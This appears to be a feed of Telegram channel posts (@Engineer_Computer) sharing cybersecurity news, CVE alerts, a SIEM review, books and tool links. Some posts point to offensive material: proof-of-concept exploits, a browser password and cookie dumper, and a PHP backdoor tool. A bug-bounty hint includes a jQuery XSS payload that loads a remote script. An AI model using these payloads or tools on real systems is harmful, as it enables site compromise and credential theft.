Researchers have uncovered a new flaw (CVE-2023-28299) in the Microsoft Visual Studio installer that could allow attackers to impersonate trusted publishers and distribute malicious extensions.
Read details:
https://thehackernews.com/2023/06/researchers-uncover-publisher-spoofing.html

@Engineer_Computer

⚠️ Urgent: A new critical RCE security #vulnerability (CVE-2023-27997) in FortiGate firewalls has been discovered. Update to the latest versions to secure your network against potential remote code execution.
Read details:
https://thehackernews.com/2023/06/critical-rce-flaw-discovered-in.html…

#infosec #cybersecurity

@Engineer_Computer

Hackers are actively exploiting the latest Fortinet's FortiOS and FortiProxy flaw, targeting government, manufacturing, and critical infrastructure sectors.
Learn more:
https://thehackernews.com/2023/06/critical-fortios-and-fortiproxy.html
Take immediate action and update to the latest firmware now!

@Engineer_Computer

#ProgrammingLanguage

The most common programming languages ​​since 2000


-Business Secure Continuity-
1402.03.23
#cybersecurity #job #training #university #future #security #business #sansinstitute #eccouncil #iso22301 #nistcybersecurityframework #isaca #cissp
#isc2 #redteam #blueteam #csirt #forensics #splunksecurity #siem #otsecurity
#tenable #nessus #ibm #emc #vmware #pentesting #eccouncil #sans #microsoft #cisco #ise

https://www.linkedin.com/posts/diyako-secure-bow_programminglanguage-cybersecurity-job-activity-7074428330229293056-52kk?utm_source=share&utm_medium=member_ios

@Engineer_Computer

چهارشنبه ۲۴ خرداد، ساعت ۱۹ می‌تونین از یوتیوب من «وبینار LPI در ایران» رو ببینین. گپی می‌زنیم در مورد این موسسه و سعی می‌کنیم با خبر «بالاخره بازم می‌شه تو ایران مدرک گرفت» شما رو سورپرایز (شادهول) کنیم و سوال‌ها رو جواب می‌دیم.

یوتیوب من: https://www.youtube.com/jadimirmirani
اطلاعات بیشتر:
https://gandotech.com/fa/events/%D9%88%D8%A8%DB%8C%D9%86%D8%A7%D8%B1-lpi-%D8%AF%D8%B1-%D8%A7%DB%8C%D8%B1%D8%A7%D9%86

SOC-CMM version 2.3 released!

The lastest version of the SOC-CMM (2.3) is now available for download. The most relevant changes for this version are:
- Technology section completely renewed and is now based on the visibility triad, augmented with SOAR
- Additional questions in the SOC management section on quality assurance, continuous improvement and achitecture within the SOC
- Many fixes and enhancements for guidance and question types
- Several sections simplified and optimized to provide a better assessment flow
- Navigation and calculation improvements

Download the new version today from the downloads page:
https://lnkd.in/eYmSybMJ

@Engineer_Computer

Proof of concept exploit for CVE-2023-2008, a bug in the udmabuf driver of the Linux kernel fixed in 5.19-rc4.
You can find a description of the bug and the exploitation strategy in our blog post.


@Engineer_Computer

مدل PassGPT مي تواند كلمه هاي عبور را پيدا كند.
#PassGPT
@Engineer_Computer

🕷CVE-2023-29336 : Win32k -  Privilege Escalation
POC : https://github.com/m-cetin/CVE-2023-29336
POC : https://github.com/numencyber/Vulnerability_PoC/blob/main/CVE-2023-29336/poc.cpp
Analysis : https://www.numencyber.com/cve-2023-29336-win32k-analysis/

@Engineer_Computer

Kaspersky Unified Monitoring and Analysis Platform

   کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر می کنم می تونه خودش رو به عنوان یکی از پرچم داران این حوزه معرفی کنه.  

@Engineer_Computer

برخي از ويژگي هاي اين محصول:

   اول EPS محصول هست که می تونه تا 300K ورودی به ازای هر نود Correlation داشته باشه. این رو مقایسه کنید مثلا با ArcSight که حداکثر از 100K EPS پشتیبانی می کنه. نکته جالب دیگه اینه که می تونیم محصول رو در حالت Distribution پیاده کنیم و در واقع قابلیت LB رو داشته باشیم.
  نکته بعدی معماری سیستم هست که به صورت میکرو سرویس طراحی شده و این علاوه بر مصرف منابع فوق العاده پایین، باعث شده دست ما در مقیاس پذیری و توسعه زیرساخت باز باشه. و البته که از HA و Fault Tolerance هم پشتیبانی می کنه.
  نکته مهم دیگه Integration محصول با ابزارهای دیگه هست. این یکپارچه سازی رو میشه به دو قسمت تقسیم کرد: محصولات کسپرسکی و محصولات Third Party. برای محصولات Third Party مثل محصولات دیگه دست ما درKUMA هم باز هست و طیف وسیعی از ابزارها رو پشتیبانی می کنه. نکته جالب اینه که برای Parser نویسی هم خودمون می تونیم به راحتی داخلش Parser رو ایجاد کنیم و هم به لطف پشتیبانی مستقیم کسپرسکی در ایران، نوشتن Parser رو از خود شرکت درخواست کنیم. اما در مورد محصولات کسپرسکی داستان متفاوته. در اینجا میتونیم مفهوم یکپارچه سازی به معنای واقعی رو ببینیم، مثلا اتصال EPP کسپرسکی به KUMA یعنی می تونیم ازش به عنوان Inventory, Asset Management, Vulnerability Assessment و غیره استفاده کنیم. این محصول با بیشتر محصولات کسپرسکی ادغام می شه که من تصویرش رو گذاشتم. اما قابلیت های افزوده به قدری زیاده که نمیشه در این مقاله همه رو پوشش داد.
   این محصول توسط کسپرسکی نوشته شده. پس یعنی میتونه به Threat Intelligence کسپرسکی متصل بشه و در برابر رقبا یک برگ برنده قوی داشته باشه. و استفاده از TDF کسپرسکی یعنی قدرت شناسایی تهدیدات فوق العاده بالا. نکته کلیدی این محصول قابلیت response هست که فعلا در حد محصولات کسپرسکیه اما در نسخه های آینده قراره این قابلیت رو برای ابزارهای Third Party دیگه مثل فایروال هم پیاده سازی کنه
  کسپرسکی با ارائه این محصول قصد داره معنای XDR رو تغییر بده و البته که با وجود این محصول در قلب XDR خودش، عملا یک SOC کامل رو می تونه پیاده سازی کنه. 
#Kaspersky
#XDR
#Threatintelligence
#KUMA

@Engineer_Computer

#کتاب evading EDR نسخه Early Access (یعنی نهایی نشده)
@Engineer_Computer

cryptography
Eurocrypt 2023: Death of a KEM
https://research.nccgroup.com/2023/06/01/eurocrypt-2023-death-of-a-kem

@Engineer_Computer

tools
Offensive security
1. HackBrowserData - CLI tool for decrypting/exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser
https://github.com/moonD4rk/HackBrowserData
2. Hiphp - Open source project for create a BackDoor to control PHP-based sites
https://github.com/yasserbdj96/hiphp

@Engineer_Computer

Techbook
The Complete Team Field Manual 2021.

@Engineer_Computer

Tech book
Red Team Guide, 2023.
https://dmcxblue.gitbook.io/red-team-notes-2-0/files/red-team-guide

@Engineer_Computer

The Red Team Playground is a #Dockerized vulnerable testing lab for learning and practicing #RedTeam concepts.
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc).
https://github.com/minispooner/red-team-playground

@Engineer_Computer

Privacy: Apple 🍎 Updates AirTags After Stalking Fears.

https://packetstormsecurity.com/news/view/32353/Apple-Updates-AirTags-After-Stalking-Fears.html

Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows.

https://github.com/86x/CVE-2023-32353-PoC

@Engineer_Computer

Bug Bounty Hint

Is your JS payload limited to only 44 symbols?

Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.

$('<script src=//dom.xss>').appendTo('body')


@Engineer_Computer

CVE-2023-23924: Dompdf up to 2.0.1 on PHP7 SVG Parser deserialization restoring in RCE.
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.

@Engineer_Computer